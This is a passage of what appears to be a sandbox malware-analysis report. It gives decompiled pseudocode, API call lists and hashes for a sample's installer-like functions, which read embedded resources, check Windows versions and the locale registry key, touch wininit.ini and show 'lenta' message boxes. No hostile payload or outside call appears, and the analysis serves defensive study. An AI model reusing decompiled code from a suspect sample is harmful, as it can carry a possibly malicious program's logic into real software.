                                                                      							_t36 = 0;
                                                                      							FreeResource(??);
                                                                      						} else {
                                                                      							FreeResource();
                                                                      							_v36 = _v36 + 1;
                                                                      							E00F8171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                      							_t46 = 0;
                                                                      							continue;
                                                                      						}
                                                                      					}
                                                                      					L12:
                                                                      					return E00F86CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                      				}
                                                                      				goto L12;
                                                                      			}






















                                                                      0x00f86298
                                                                      0x00f862a0
                                                                      0x00f862a7
                                                                      0x00f862ad
                                                                      0x00f862af
                                                                      0x00f862bb
                                                                      0x00f862c3
                                                                      0x00f862c4
                                                                      0x00f8633b
                                                                      0x00f8633b
                                                                      0x00f86345
                                                                      0x00f8634d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f862da
                                                                      0x00f862de
                                                                      0x00f8635f
                                                                      0x00f86369
                                                                      0x00f862e0
                                                                      0x00f862e0
                                                                      0x00f862e0
                                                                      0x00f862e3
                                                                      0x00f862e5
                                                                      0x00f862e5
                                                                      0x00f862e8
                                                                      0x00f862e8
                                                                      0x00f862ea
                                                                      0x00f862eb
                                                                      0x00f862ef
                                                                      0x00f862f1
                                                                      0x00f862f3
                                                                      0x00f86302
                                                                      0x00f86308
                                                                      0x00f8630d
                                                                      0x00f86314
                                                                      0x00f86314
                                                                      0x00f86316
                                                                      0x00f86319
                                                                      0x00f86355
                                                                      0x00f86357
                                                                      0x00f8631b
                                                                      0x00f8631b
                                                                      0x00f86331
                                                                      0x00f86334
                                                                      0x00f86339
                                                                      0x00000000
                                                                      0x00f86339
                                                                      0x00f86319
                                                                      0x00f8636b
                                                                      0x00f8637d
                                                                      0x00f8637d
                                                                      0x00000000

                                                                      APIs
                                                                        • Part of subcall function 00F8171E: _vsnprintf.MSVCRT ref: 00F81750
                                                                      • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00F851CA,00000004,00000024,00F82F71,?,00000002,00000000), ref: 00F862CD
                                                                      • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00F851CA,00000004,00000024,00F82F71,?,00000002,00000000), ref: 00F862D4
                                                                      • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00F851CA,00000004,00000024,00F82F71,?,00000002,00000000), ref: 00F8631B
                                                                      • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00F86345
                                                                      • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00F851CA,00000004,00000024,00F82F71,?,00000002,00000000), ref: 00F86357
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                      • String ID: UPDFILE%lu
                                                                      • API String ID: 2922116661-2329316264
                                                                      • Opcode ID: fe12ebcf1929f11c5a9e7d1b056afb56cfede8c5affcc726db414384a53fa5e1
                                                                      • Instruction ID: 096558f961a4bfc61cf7c631631876f6364363db60d10102d41139e112eec9ba
                                                                      • Opcode Fuzzy Hash: fe12ebcf1929f11c5a9e7d1b056afb56cfede8c5affcc726db414384a53fa5e1
                                                                      • Instruction Fuzzy Hash: C121F671A00219ABEB10AFA4DC499FE7B7CFB44710B00021AF902E3241DB359D02ABE1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 94%
                                                                      			E00F8681F(void* __ebx) {
                                                                      				signed int _v8;
                                                                      				char _v20;
                                                                      				struct _OSVERSIONINFOA _v168;
                                                                      				void* _v172;
                                                                      				int* _v176;
                                                                      				int _v180;
                                                                      				int _v184;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t19;
                                                                      				long _t31;
                                                                      				signed int _t35;
                                                                      				void* _t36;
                                                                      				intOrPtr _t41;
                                                                      				signed int _t44;
                                                                      
                                                                      				_t36 = __ebx;
                                                                      				_t19 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t19 ^ _t44;
                                                                      				_t41 =  *0xf881d8; // 0xfffffffe
                                                                      				_t43 = 0;
                                                                      				_v180 = 0xc;
                                                                      				_v176 = 0;
                                                                      				if(_t41 == 0xfffffffe) {
                                                                      					 *0xf881d8 = 0;
                                                                      					_v168.dwOSVersionInfoSize = 0x94;
                                                                      					if(GetVersionExA( &_v168) == 0) {
                                                                      						L12:
                                                                      						_t41 =  *0xf881d8; // 0xfffffffe
                                                                      					} else {
                                                                      						_t41 = 1;
                                                                      						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                      							goto L12;
                                                                      						} else {
                                                                      							_t31 = RegQueryValueExA(_v172, 0xf81140, 0,  &_v184,  &_v20,  &_v180);
                                                                      							_t43 = _t31;
                                                                      							RegCloseKey(_v172);
                                                                      							if(_t31 != 0) {
                                                                      								goto L12;
                                                                      							} else {
                                                                      								_t40 =  &_v176;
                                                                      								if(E00F866F9( &_v20,  &_v176) == 0) {
                                                                      									goto L12;
                                                                      								} else {
                                                                      									_t35 = _v176 & 0x000003ff;
                                                                      									if(_t35 == 1 || _t35 == 0xd) {
                                                                      										 *0xf881d8 = _t41;
                                                                      									} else {
                                                                      										goto L12;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				return E00F86CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                      			}


















                                                                      0x00f8681f
                                                                      0x00f8682a
                                                                      0x00f86831
                                                                      0x00f86836
                                                                      0x00f8683c
                                                                      0x00f8683e
                                                                      0x00f86848
                                                                      0x00f86851
                                                                      0x00f8685d
                                                                      0x00f86864
                                                                      0x00f86876
                                                                      0x00f8693a
                                                                      0x00f8693a
                                                                      0x00f8687c
                                                                      0x00f8687e
                                                                      0x00f86885
                                                                      0x00000000
                                                                      0x00f868d6
                                                                      0x00f868f4
                                                                      0x00f86900
                                                                      0x00f86902
                                                                      0x00f8690a
                                                                      0x00000000
                                                                      0x00f8690c
                                                                      0x00f8690c
                                                                      0x00f8691c
                                                                      0x00000000
                                                                      0x00f8691e
                                                                      0x00f86924
                                                                      0x00f8692b
                                                                      0x00f86932
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f8692b
                                                                      0x00f8691c
                                                                      0x00f8690a
                                                                      0x00f86885
                                                                      0x00f86876
                                                                      0x00f86951

                                                                      APIs
                                                                      • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00F8686E
                                                                      • GetSystemMetrics.USER32(0000004A), ref: 00F868A7
                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00F868CC
                                                                      • RegQueryValueExA.ADVAPI32(?,00F81140,00000000,?,?,0000000C), ref: 00F868F4
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00F86902
                                                                        • Part of subcall function 00F866F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00F8691A), ref: 00F86741
                                                                      Strings
                                                                      • Control Panel\Desktop\ResourceLocale, xrefs: 00F868C2
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                      • String ID: Control Panel\Desktop\ResourceLocale
                                                                      • API String ID: 3346862599-1109908249
                                                                      • Opcode ID: 63292bd12a7d01b1a19ff9d36df6a02092d7f4ef4ff2bb8df984a6fff1e343d3
                                                                      • Instruction ID: 5e4cdcefcdd49df0254a7cd117f3542546a212dab8753b31df69f90f0481b5ef
                                                                      • Opcode Fuzzy Hash: 63292bd12a7d01b1a19ff9d36df6a02092d7f4ef4ff2bb8df984a6fff1e343d3
                                                                      • Instruction Fuzzy Hash: 2E313C31E00228DFDB31AB51DD45BEAB7B9EB45778F0001A5E949E6180DB309E86EF52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00F83A3F(void* __eflags) {
                                                                      				void* _t3;
                                                                      				void* _t9;
                                                                      				CHAR* _t16;
                                                                      
                                                                      				_t16 = "LICENSE";
                                                                      				_t1 = E00F8468F(_t16, 0, 0) + 1; // 0x1
                                                                      				_t3 = LocalAlloc(0x40, _t1);
                                                                      				 *0xf88d4c = _t3;
                                                                      				if(_t3 != 0) {
                                                                      					_t19 = _t16;
                                                                      					if(E00F8468F(_t16, _t3, _t28) != 0) {
                                                                      						if(lstrcmpA( *0xf88d4c, "<None>") == 0) {
                                                                      							LocalFree( *0xf88d4c);
                                                                      							L9:
                                                                      							 *0xf89124 = 0;
                                                                      							return 1;
                                                                      						}
                                                                      						_t9 = E00F86517(_t19, 0x7d1, 0, E00F83100, 0, 0);
                                                                      						LocalFree( *0xf88d4c);
                                                                      						if(_t9 != 0) {
                                                                      							goto L9;
                                                                      						}
                                                                      						 *0xf89124 = 0x800704c7;
                                                                      						L2:
                                                                      						return 0;
                                                                      					}
                                                                      					E00F844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                      					LocalFree( *0xf88d4c);
                                                                      					 *0xf89124 = 0x80070714;
                                                                      					goto L2;
                                                                      				}
                                                                      				E00F844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                      				 *0xf89124 = E00F86285();
                                                                      				goto L2;
                                                                      			}






                                                                      0x00f83a46
                                                                      0x00f83a57
                                                                      0x00f83a5d
                                                                      0x00f83a63
                                                                      0x00f83a6a
                                                                      0x00f83a91
                                                                      0x00f83a9a
                                                                      0x00f83ad8
                                                                      0x00f83b13
                                                                      0x00f83b19
                                                                      0x00f83b1b
                                                                      0x00000000
                                                                      0x00f83b21
                                                                      0x00f83ae7
                                                                      0x00f83af4
                                                                      0x00f83afc
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f83afe
                                                                      0x00f83a87
                                                                      0x00000000
                                                                      0x00f83a87
                                                                      0x00f83aa8
                                                                      0x00f83ab3
                                                                      0x00f83ab9
                                                                      0x00000000
                                                                      0x00f83ab9
                                                                      0x00f83a78
                                                                      0x00f83a82
                                                                      0x00000000

                                                                      APIs
                                                                        • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846A0
                                                                        • Part of subcall function 00F8468F: SizeofResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846A9
                                                                        • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846C3
                                                                        • Part of subcall function 00F8468F: LoadResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846CC
                                                                        • Part of subcall function 00F8468F: LockResource.KERNEL32(00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846D3
                                                                        • Part of subcall function 00F8468F: memcpy_s.MSVCRT ref: 00F846E5
                                                                        • Part of subcall function 00F8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846EF
                                                                      • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00F82F64,?,00000002,00000000), ref: 00F83A5D
                                                                      • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00F83AB3
                                                                        • Part of subcall function 00F844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F84518
                                                                        • Part of subcall function 00F844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00F84554
                                                                        • Part of subcall function 00F86285: GetLastError.KERNEL32(00F85BBC), ref: 00F86285
                                                                      • lstrcmpA.KERNEL32(<None>,00000000), ref: 00F83AD0
                                                                      • LocalFree.KERNEL32 ref: 00F83B13
                                                                        • Part of subcall function 00F86517: FindResourceA.KERNEL32(00F80000,000007D6,00000005), ref: 00F8652A
                                                                        • Part of subcall function 00F86517: LoadResource.KERNEL32(00F80000,00000000,?,?,00F82EE8,00000000,00F819E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00F86538
                                                                        • Part of subcall function 00F86517: DialogBoxIndirectParamA.USER32(00F80000,00000000,00000547,00F819E0,00000000), ref: 00F86557
                                                                        • Part of subcall function 00F86517: FreeResource.KERNEL32(00000000,?,?,00F82EE8,00000000,00F819E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00F86560
                                                                      • LocalFree.KERNEL32(00000000,00F83100,00000000,00000000), ref: 00F83AF4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                      • String ID: <None>$LICENSE
                                                                      • API String ID: 2414642746-383193767
                                                                      • Opcode ID: 406b4e378b7158b032ef692b86b51c349143a542b2ab3f86b1b221eb43cd2b28
                                                                      • Instruction ID: 6a8943fccb5941db224efa4346a7741be0122548405fb68394f72c7b7cbc4e2e
                                                                      • Opcode Fuzzy Hash: 406b4e378b7158b032ef692b86b51c349143a542b2ab3f86b1b221eb43cd2b28
                                                                      • Instruction Fuzzy Hash: 2611D672704205ABD724BF729C0DFF779B9EBD5B50B10412EB541DA1B1EABD9802B720
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 94%
                                                                      			E00F824E0(void* __ebx) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t7;
                                                                      				void* _t20;
                                                                      				long _t26;
                                                                      				signed int _t27;
                                                                      
                                                                      				_t20 = __ebx;
                                                                      				_t7 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t7 ^ _t27;
                                                                      				_t25 = 0x104;
                                                                      				_t26 = 0;
                                                                      				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                      					E00F8658A( &_v268, 0x104, "wininit.ini");
                                                                      					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                      					_t25 = _lopen( &_v268, 0x40);
                                                                      					if(_t25 != 0xffffffff) {
                                                                      						_t26 = _llseek(_t25, 0, 2);
                                                                      						_lclose(_t25);
                                                                      					}
                                                                      				}
                                                                      				return E00F86CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                      			}











                                                                      0x00f824e0
                                                                      0x00f824eb
                                                                      0x00f824f2
                                                                      0x00f824f7
                                                                      0x00f82504
                                                                      0x00f8250e
                                                                      0x00f8251d
                                                                      0x00f8252c
                                                                      0x00f82541
                                                                      0x00f82546
                                                                      0x00f82553
                                                                      0x00f82555
                                                                      0x00f82555
                                                                      0x00f82546
                                                                      0x00f8256c

                                                                      APIs
                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00F82506
                                                                      • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00F8252C
                                                                      • _lopen.KERNEL32(?,00000040), ref: 00F8253B
                                                                      • _llseek.KERNEL32(00000000,00000000,00000002), ref: 00F8254C
                                                                      • _lclose.KERNEL32(00000000), ref: 00F82555
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                      • String ID: wininit.ini
                                                                      • API String ID: 3273605193-4206010578
                                                                      • Opcode ID: dc81203c369446bbc4cd6c1a2683949f007b9022488b1e5f08c39ce59561e621
                                                                      • Instruction ID: 332e8665e8469580608c41832836f5eab2903e12a3eb633747f354da73c673ee
                                                                      • Opcode Fuzzy Hash: dc81203c369446bbc4cd6c1a2683949f007b9022488b1e5f08c39ce59561e621
                                                                      • Instruction Fuzzy Hash: 7E01B532A0011867D720AB65DC0CEEF7B7CEB45760F040155FA49D7190DE749E46DB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E00F836EE(CHAR* __ecx) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				struct _OSVERSIONINFOA _v416;
                                                                      				signed int _v420;
                                                                      				signed int _v424;
                                                                      				CHAR* _v428;
                                                                      				CHAR* _v432;
                                                                      				signed int _v436;
                                                                      				CHAR* _v440;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t72;
                                                                      				CHAR* _t77;
                                                                      				CHAR* _t91;
                                                                      				CHAR* _t94;
                                                                      				int _t97;
                                                                      				CHAR* _t98;
                                                                      				signed char _t99;
                                                                      				CHAR* _t104;
                                                                      				signed short _t107;
                                                                      				signed int _t109;
                                                                      				short _t113;
                                                                      				void* _t114;
                                                                      				signed char _t115;
                                                                      				short _t119;
                                                                      				CHAR* _t123;
                                                                      				CHAR* _t124;
                                                                      				CHAR* _t129;
                                                                      				signed int _t131;
                                                                      				signed int _t132;
                                                                      				CHAR* _t135;
                                                                      				CHAR* _t138;
                                                                      				signed int _t139;
                                                                      
                                                                      				_t72 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t72 ^ _t139;
                                                                      				_v416.dwOSVersionInfoSize = 0x94;
                                                                      				_t115 = __ecx;
                                                                      				_t135 = 0;
                                                                      				_v432 = __ecx;
                                                                      				_t138 = 0;
                                                                      				if(GetVersionExA( &_v416) != 0) {
                                                                      					_t133 = _v416.dwMajorVersion;
                                                                      					_t119 = 2;
                                                                      					_t77 = _v416.dwPlatformId - 1;
                                                                      					__eflags = _t77;
                                                                      					if(_t77 == 0) {
                                                                      						_t119 = 0;
                                                                      						__eflags = 1;
                                                                      						 *0xf88184 = 1;
                                                                      						 *0xf88180 = 1;
                                                                      						L13:
                                                                      						 *0xf89a40 = _t119;
                                                                      						L14:
                                                                      						__eflags =  *0xf88a34 - _t138; // 0x0
                                                                      						if(__eflags != 0) {
                                                                      							goto L66;
                                                                      						}
                                                                      						__eflags = _t115;
                                                                      						if(_t115 == 0) {
                                                                      							goto L66;
                                                                      						}
                                                                      						_v428 = _t135;
                                                                      						__eflags = _t119;
                                                                      						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                      						_t11 =  &_v420;
                                                                      						 *_t11 = _v420 & _t138;
                                                                      						__eflags =  *_t11;
                                                                      						_v440 = _t115;
                                                                      						do {
                                                                      							_v424 = _t135 * 0x18;
                                                                      							_v436 = E00F82A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                      							_t91 = E00F82A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                      							_t123 = _v436;
                                                                      							_t133 = 0x54d;
                                                                      							__eflags = _t123;
                                                                      							if(_t123 < 0) {
                                                                      								L32:
                                                                      								__eflags = _v420 - 1;
                                                                      								if(_v420 == 1) {
                                                                      									_t138 = 0x54c;
                                                                      									L36:
                                                                      									__eflags = _t138;
                                                                      									if(_t138 != 0) {
                                                                      										L40:
                                                                      										__eflags = _t138 - _t133;
                                                                      										if(_t138 == _t133) {
                                                                      											L30:
                                                                      											_v420 = _v420 & 0x00000000;
                                                                      											_t115 = 0;
                                                                      											_v436 = _v436 & 0x00000000;
                                                                      											__eflags = _t138 - _t133;
                                                                      											_t133 = _v432;
                                                                      											if(__eflags != 0) {
                                                                      												_t124 = _v440;
                                                                      											} else {
                                                                      												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                      												_v420 =  &_v268;
                                                                      											}
                                                                      											__eflags = _t124;
                                                                      											if(_t124 == 0) {
                                                                      												_t135 = _v436;
                                                                      											} else {
                                                                      												_t99 = _t124[0x30];
                                                                      												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                      												__eflags = _t99 & 0x00000001;
                                                                      												if((_t99 & 0x00000001) == 0) {
                                                                      													asm("sbb ebx, ebx");
                                                                      													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                      												} else {
                                                                      													_t115 = 0x104;
                                                                      												}
                                                                      											}
                                                                      											__eflags =  *0xf88a38 & 0x00000001;
                                                                      											if(( *0xf88a38 & 0x00000001) != 0) {
                                                                      												L64:
                                                                      												_push(0);
                                                                      												_push(0x30);
                                                                      												_push(_v420);
                                                                      												_push("lenta");
                                                                      												goto L65;
                                                                      											} else {
                                                                      												__eflags = _t135;
                                                                      												if(_t135 == 0) {
                                                                      													goto L64;
                                                                      												}
                                                                      												__eflags =  *_t135;
                                                                      												if( *_t135 == 0) {
                                                                      													goto L64;
                                                                      												}
                                                                      												MessageBeep(0);
                                                                      												_t94 = E00F8681F(_t115);
                                                                      												__eflags = _t94;
                                                                      												if(_t94 == 0) {
                                                                      													L57:
                                                                      													0x180030 = 0x30;
                                                                      													L58:
                                                                      													_t97 = MessageBoxA(0, _t135, "lenta", 0x00180030 | _t115);
                                                                      													__eflags = _t115 & 0x00000004;
                                                                      													if((_t115 & 0x00000004) == 0) {
                                                                      														__eflags = _t115 & 0x00000001;
                                                                      														if((_t115 & 0x00000001) == 0) {
                                                                      															goto L66;
                                                                      														}
                                                                      														__eflags = _t97 - 1;
                                                                      														L62:
                                                                      														if(__eflags == 0) {
                                                                      															_t138 = 0;
                                                                      														}
                                                                      														goto L66;
                                                                      													}
                                                                      													__eflags = _t97 - 6;
                                                                      													goto L62;
                                                                      												}
                                                                      												_t98 = E00F867C9(_t124, _t124);
                                                                      												__eflags = _t98;
                                                                      												if(_t98 == 0) {
                                                                      													goto L57;
                                                                      												}
                                                                      												goto L58;
                                                                      											}
                                                                      										}
                                                                      										__eflags = _t138 - 0x54c;
                                                                      										if(_t138 == 0x54c) {
                                                                      											goto L30;
                                                                      										}
                                                                      										__eflags = _t138;
                                                                      										if(_t138 == 0) {
                                                                      											goto L66;
                                                                      										}
                                                                      										_t135 = 0;
                                                                      										__eflags = 0;
                                                                      										goto L44;
                                                                      									}
                                                                      									L37:
                                                                      									_t129 = _v432;
                                                                      									__eflags = _t129[0x7c];
                                                                      									if(_t129[0x7c] == 0) {
                                                                      										goto L66;
                                                                      									}
                                                                      									_t133 =  &_v268;
                                                                      									_t104 = E00F828E8(_t129,  &_v268, _t129,  &_v428);
                                                                      									__eflags = _t104;
                                                                      									if(_t104 != 0) {
                                                                      										goto L66;
                                                                      									}
                                                                      									_t135 = _v428;
                                                                      									_t133 = 0x54d;
                                                                      									_t138 = 0x54d;
                                                                      									goto L40;
                                                                      								}
                                                                      								goto L33;
                                                                      							}
                                                                      							__eflags = _t91;
                                                                      							if(_t91 > 0) {
                                                                      								goto L32;
                                                                      							}
                                                                      							__eflags = _t123;
                                                                      							if(_t123 != 0) {
                                                                      								__eflags = _t91;
                                                                      								if(_t91 != 0) {
                                                                      									goto L37;
                                                                      								}
                                                                      								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                      								L27:
                                                                      								if(__eflags <= 0) {
                                                                      									goto L37;
                                                                      								}
                                                                      								L28:
                                                                      								__eflags = _t135;
                                                                      								if(_t135 == 0) {
                                                                      									goto L33;
                                                                      								}
                                                                      								_t138 = 0x54c;
                                                                      								goto L30;
                                                                      							}
                                                                      							__eflags = _t91;
                                                                      							_t107 = _v416.dwBuildNumber;
                                                                      							if(_t91 != 0) {
                                                                      								_t131 = _v424;
                                                                      								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                      								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                      									goto L37;
                                                                      								}
                                                                      								goto L28;
                                                                      							}
                                                                      							_t132 = _t107 & 0x0000ffff;
                                                                      							_t109 = _v424;
                                                                      							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                      							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                      								goto L28;
                                                                      							}
                                                                      							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                      							goto L27;
                                                                      							L33:
                                                                      							_t135 =  &(_t135[1]);
                                                                      							_v428 = _t135;
                                                                      							_v420 = _t135;
                                                                      							__eflags = _t135 - 2;
                                                                      						} while (_t135 < 2);
                                                                      						goto L36;
                                                                      					}
                                                                      					__eflags = _t77 == 1;
                                                                      					if(_t77 == 1) {
                                                                      						 *0xf89a40 = _t119;
                                                                      						 *0xf88184 = 1;
                                                                      						 *0xf88180 = 1;
                                                                      						__eflags = _t133 - 3;
                                                                      						if(_t133 > 3) {
                                                                      							__eflags = _t133 - 5;
                                                                      							if(_t133 < 5) {
                                                                      								goto L14;
                                                                      							}
                                                                      							_t113 = 3;
                                                                      							_t119 = _t113;
                                                                      							goto L13;
                                                                      						}
                                                                      						_t119 = 1;
                                                                      						_t114 = 3;
                                                                      						 *0xf89a40 = 1;
                                                                      						__eflags = _t133 - _t114;
                                                                      						if(__eflags < 0) {
                                                                      							L9:
                                                                      							 *0xf88184 = _t135;
                                                                      							 *0xf88180 = _t135;
                                                                      							goto L14;
                                                                      						}
                                                                      						if(__eflags != 0) {
                                                                      							goto L14;
                                                                      						}
                                                                      						__eflags = _v416.dwMinorVersion - 0x33;
                                                                      						if(_v416.dwMinorVersion >= 0x33) {
                                                                      							goto L14;
                                                                      						}
                                                                      						goto L9;
                                                                      					}
                                                                      					_t138 = 0x4ca;
                                                                      					goto L44;
                                                                      				} else {
                                                                      					_t138 = 0x4b4;
                                                                      					L44:
                                                                      					_push(_t135);
                                                                      					_push(0x10);
                                                                      					_push(_t135);
                                                                      					_push(_t135);
                                                                      					L65:
                                                                      					_t133 = _t138;
                                                                      					E00F844B9(0, _t138);
                                                                      					L66:
                                                                      					return E00F86CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                      				}
                                                                      			}





































                                                                      0x00f836f9
                                                                      0x00f83700
                                                                      0x00f8370c
                                                                      0x00f83716
                                                                      0x00f83718
                                                                      0x00f8371b
                                                                      0x00f83721
                                                                      0x00f8372b
                                                                      0x00f8373d
                                                                      0x00f83745
                                                                      0x00f83746
                                                                      0x00f83746
                                                                      0x00f83749
                                                                      0x00f837ab
                                                                      0x00f837ad
                                                                      0x00f837ae
                                                                      0x00f837b3
                                                                      0x00f837b8
                                                                      0x00f837b8
                                                                      0x00f837bf
                                                                      0x00f837bf
                                                                      0x00f837c5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f837cb
                                                                      0x00f837cd
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f837d5
                                                                      0x00f837db
                                                                      0x00f837e8
                                                                      0x00f837ea
                                                                      0x00f837ea
                                                                      0x00f837ea
